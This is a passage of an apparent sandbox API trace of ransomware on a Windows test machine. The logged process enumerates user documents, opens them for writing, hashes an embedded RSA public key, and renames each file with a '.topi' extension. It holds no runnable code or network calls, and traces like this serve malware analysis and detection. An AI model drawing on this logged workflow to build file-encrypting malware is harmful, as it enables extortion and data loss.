halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\j2izyyqk4ggn.csv.topi")) returned 1 [0097.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.559] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.561] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ae46000, ftCreationTime.dwHighDateTime=0x1d5c4a5, ftLastAccessTime.dwLowDateTime=0xd950c350, ftLastAccessTime.dwHighDateTime=0x1d5bc97, ftLastWriteTime.dwLowDateTime=0xd950c350, ftLastWriteTime.dwHighDateTime=0x1d5bc97, nFileSizeHigh=0x0, nFileSizeLow=0x1008d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jjMXxhBuYwtRmQIOiW.csv", cAlternateFileName="JJMXXH~1.CSV")) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.561] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\jjMXxhBuYwtRmQIOiW.csv") returned=".csv" [0097.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\jjMXxhBuYwtRmQIOiW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\jjmxxhbuywtrmqioiw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.561] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65677) returned 1 [0097.561] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.564] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10067, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.564] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.565] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.565] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.565] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1008d, lpOverlapped=0x0) returned 1 [0097.566] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.566] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.566] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.566] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.567] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.567] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.567] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.567] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.567] GetLastError () returned 0x0 [0097.567] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.567] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.567] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.567] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.567] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10090) returned 0x9a06a00 [0097.568] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb650 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb698 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4eb0 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.568] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ec8 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4eb0 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.569] GetCurrentThreadId () returned 0x8c4 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9c80 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.569] GetCurrentThreadId () returned 0x8c4 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4eb0 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.572] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\jjMXxhBuYwtRmQIOiW.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\jjmxxhbuywtrmqioiw.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\jjMXxhBuYwtRmQIOiW.csv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\jjmxxhbuywtrmqioiw.csv.topi")) returned 1 [0097.572] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.572] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.572] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.574] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12248a0, ftCreationTime.dwHighDateTime=0x1d5b599, ftLastAccessTime.dwLowDateTime=0xcad20640, ftLastAccessTime.dwHighDateTime=0x1d5c00c, ftLastWriteTime.dwLowDateTime=0xcad20640, ftLastWriteTime.dwHighDateTime=0x1d5c00c, nFileSizeHigh=0x0, nFileSizeLow=0xfaab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n_XHh3jFU9i-h.ots", cAlternateFileName="N_XHH3~1.OTS")) returned 1 [0097.574] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\n_XHh3jFU9i-h.ots") returned=".ots" [0097.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\n_XHh3jFU9i-h.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\n_xhh3jfu9i-h.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.574] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=64171) returned 1 [0097.574] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.577] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfa85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.577] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.578] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.579] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.579] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.579] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.579] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.579] GetLastError () returned 0x0 [0097.579] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.579] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.579] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.579] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.579] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.579] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfab0) returned 0x9a06a00 [0097.580] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb698 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb6e0 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ec8 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ee0 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.580] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.580] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ec8 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ee0 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ee0 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4ec8 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.581] RtlAllocateHeap 